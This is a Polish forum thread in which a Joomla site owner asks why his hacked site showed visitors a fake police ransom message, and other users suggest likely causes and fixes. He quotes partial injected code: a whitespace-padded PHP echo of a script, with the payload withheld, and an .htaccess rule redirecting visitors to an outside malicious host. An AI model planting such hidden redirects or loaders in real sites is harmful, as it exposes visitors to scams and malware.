Atak na witrynę, gdzie szukać przyczyny
Strona 1 z 2 12 OstatniOstatni
Wyniki 1 do 10 z 12

Temat: Atak na witrynę, gdzie szukać przyczyny

  1. #1
    Debiutant
    Dołączył
    10-01-2013
    Wpisy
    5
    Punkty
    2

    Domyślny Atak na witrynę, gdzie szukać przyczyny

    Witam,

    moja witryna została zaatakowana. Kaspersky wykrył: http://www.securelist.com/en/descrip...Script.Generic
    U osób bez zabezpieczonego systemu pojawiała się fałszywa informacja Policji namawiająca do zapłacenia kary.

    Zapoznałem się z listą kroków po włamaniu. Skrypt pokazał, że dwóch dni były modyfikowane praktycznie cały czas pliki *.jpg. Sam zauważyłem, że jeden z folderów po prostu zniknął.

    Z plików php zauważyłem, że modyfikowane były wyłącznie indexy katalogów z layoutami. Został do nich wstrzyknięty dziwny kod, zawierający bardzo dużo jakiś liczb, zaczynający się i kończący tagami
    Kod:
    <?#336988#
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      echo "                                                                                                                                                                                                                                                                                                                                                                                                                                                                  <script type=\"text/javascript\" language=\"javascript\" >                                                                                                                                                                                                                                                                                                                                                                                                                                                                  
    
    [tutaj cała reszta, nie wklejam celowo, bo kaspersky traktuje to od razu jako wirus]
    
    </script>";
    
    
    #/336988#
    ?>
    Do pliku .htaccess wstrzyknięto coś takiego:

    Kod:
    #336988#<IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond %{HTTP_REFERER} ^.*(
    
    [tu jakieś dziwne tagi]
    
    
    RewriteRule ^(.*)$ http://mamazwiara.home.pl/clik.php [R=301,L]
    </IfModule>
    
    
    #/336988#
    Ponieważ miałem kopię bezpieczeństwa, którą wykonuję regularnie - otworzenie witryny nie powinno stanowić problemu.

    Piszę tutaj ponieważ nie bardzo mam pomysł w jaki sposób dojść do pliku/plików przez które nastąpił atak. Czy ma ktoś jakiś pomysł jak zabezpieczyć się przed kolejnymi?
    Kolejną sprawą jest jakie jest prawdopodobieństwo, że osoba dokonująca ataku jest w posiadaniu jakichkolwiek haseł?

    Mam słabe pojęcie o tym, mam nadzieję, że podałem wystarczająco informacji, by cokolwiek stwierdzić lub pomóc uchronić się od następnych ataków.

  2. Pani Reklamowa
    Pani Reklamowa jest aktywna
    Avatar Panny Google

    Dołączył
    19-08-2010
    Skąd
    Internet
    Postów
    milion
    Pochwał
    setki
  3. #2
    Senior PeFik awatar
    Dołączył
    18-02-2007
    Skąd
    Miasto Stu Mostów
    Wpisy
    5 465
    Punkty
    241

    Domyślny

    Naprawiałem już nie takie włamiania, i wiem jedno na ogół włamiania wynikają z 3 przyczyn:
    a) ktoś zapomniał zaktualizować CMS
    b) ktos miał login "admin" i hasło typu "1234" albo inne tajne.
    c) ktoś używał dziurwego komponentu

    Zatem wyjście jest tylko jedno, zleć audyt i zabezpieczenie (instalacja komponentu oraz/lub pluginu + zmiany w httacessie).

    Kolejną sprawą jest jakie jest prawdopodobieństwo, że osoba dokonująca ataku jest w posiadaniu jakichkolwiek haseł?
    Na pewno zna już dane bazy danych
    Jeśli byłeś tak naiwny, aby dać w konfiguracji dane do FTP - zna je również.
    Współautor bloga o systemie Joomla! -> blog.elimu.pl < oraz kilku książek i artykułów o tym CMS.

  4. #3
    Debiutant
    Dołączył
    10-01-2013
    Wpisy
    5
    Punkty
    2

    Domyślny

    a) Joomla jest zaktualizowana do wersji 1.5.26
    b) rzeczywiście korzystałem z loginu "admin" hasło miałem silne. Sama nazwa "admin" może powodować włamanie?
    c) tutaj nei jestem w stanie się wypowiedzieć

  5. #4
    Senior PeFik awatar
    Dołączył
    18-02-2007
    Skąd
    Miasto Stu Mostów
    Wpisy
    5 465
    Punkty
    241

    Domyślny

    b) owszem, dziwisz się? bo ja nie.
    c) stąd audyt
    Współautor bloga o systemie Joomla! -> blog.elimu.pl < oraz kilku książek i artykułów o tym CMS.

  6. #5
    Debiutant
    Dołączył
    10-01-2013
    Wpisy
    5
    Punkty
    2

    Domyślny

    Kilka dni temu na moim starym komputerze pojawił się taki sam wirus (info o zapłacie Policji). Prosto się go pozbyłem poprzez odzyskanie systemu i instalację innego oprogramowania antywirusowego (stara licencja wygasła).
    Na tym komputerze mam dodany serwer FTP w total commanderze. Przeczytałem w sieci, że ten wirus mógł po prostu wykraść mi hasło z programu. Po przywróceniu plików pozmieniam wszystkie hasła i zobaczę czy problem się powtórzy, bo wydaje mi się, że bardzo prawdopodobnie wynikło to z mojej głupoty i słabo zabezpieczonego sprzętu, z którego korzystam raz na ruski rok. To chyba jest możliwe?

    http://di.com.pl/news/26343,0,Wstrzy...przez_FTP.html

    wersja TC na moim starym kompie to 7.02

    Chyba to jest przyczyna.
    Ostanio edytowane przez itravispl : 10-01-2013 17:12

  7. #6
    Senior PeFik awatar
    Dołączył
    18-02-2007
    Skąd
    Miasto Stu Mostów
    Wpisy
    5 465
    Punkty
    241

    Domyślny

    Ja mam TC i nie miałem tego problemu, chyba że łączysz się przez torrenty i ktoś ci pobrał o jeden plik za dużo, widziałem i takich.

    - - - Updated - - -

    p.s.
    dane do FTP to jedno, a zabezpieczenia strony to zupełnie inna bajka.
    Współautor bloga o systemie Joomla! -> blog.elimu.pl < oraz kilku książek i artykułów o tym CMS.

  8. #7
    Bywalec ugly kid joe awatar
    Dołączył
    09-11-2012
    Skąd
    C:\WINDOWS\Wirusy i Trojany
    Wpisy
    342
    Punkty
    18

    Domyślny

    mógłbyś pokazać ekran z tym komunikatem ?
    moje nowe alter ego

  9. #8
    Debiutant
    Dołączył
    10-01-2013
    Wpisy
    5
    Punkty
    2

    Domyślny

    Cytat Wysłane przez ugly kid joe Zobacz wiadomość
    mógłbyś pokazać ekran z tym komunikatem ?
    ten z "policji"?

  10. #9
    Bywalec ugly kid joe awatar
    Dołączył
    09-11-2012
    Skąd
    C:\WINDOWS\Wirusy i Trojany
    Wpisy
    342
    Punkty
    18

    Domyślny

    tak ...
    moje nowe alter ego

  11. #10
    Debiutant
    Dołączył
    10-01-2013
    Wpisy
    5
    Punkty
    2

    Domyślny

    http://www.cert.pl/news/5483

    co prawda wyglądało to ciut inaczej, ale bardzo podobnie.

Strona 1 z 2 12 OstatniOstatni

Podobne tematy

  1. Online gdzie szukać pliku?
    przez longerr na forum Szablony, wygląd, formatowanie
    Odpowiedzi: 3
    Ostatni post/autor: 04-02-2012, 22:52
  2. Dziwny problem, gdzie szukać przyczyny?
    przez PiECIA na forum Szablony, wygląd, formatowanie
    Odpowiedzi: 4
    Ostatni post/autor: 16-06-2010, 16:48
  3. mod_adsense_joomlaspan_3_ClickSafe - gdzie szukać kodu?
    przez cuker na forum Biznes: sklepy, ogłoszenia, katalogi produktów
    Odpowiedzi: 1
    Ostatni post/autor: 03-04-2010, 13:41
  4. gdzie szukać copyright
    przez lormitto na forum Różne
    Odpowiedzi: 3
    Ostatni post/autor: 30-01-2010, 12:13
  5. gdzie tego szukać - h1 i h2 ?
    przez Marceli na forum Szablony, wygląd, formatowanie
    Odpowiedzi: 3
    Ostatni post/autor: 11-08-2009, 17:40

Reguły pisania

  • Nie możesz zakładać nowych tematów
  • Nie możesz dodawać wypowiedzi
  • Nie możesz dodawać załączników
  • Nie możesz poprawiać swoich postów
  •